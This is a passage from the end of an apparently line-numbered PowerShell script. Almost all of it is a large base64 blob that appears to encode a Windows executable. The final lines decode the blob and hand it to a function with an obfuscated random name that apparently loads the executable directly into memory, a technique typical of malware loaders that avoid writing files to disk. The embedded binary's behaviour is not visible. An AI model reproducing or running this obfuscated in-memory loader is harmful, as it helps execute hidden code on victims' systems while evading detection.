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"
2761. [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
2762. Invoke-COVDQSQKASLYKYN -PEBytes $PEBytes
2763.  
2764. }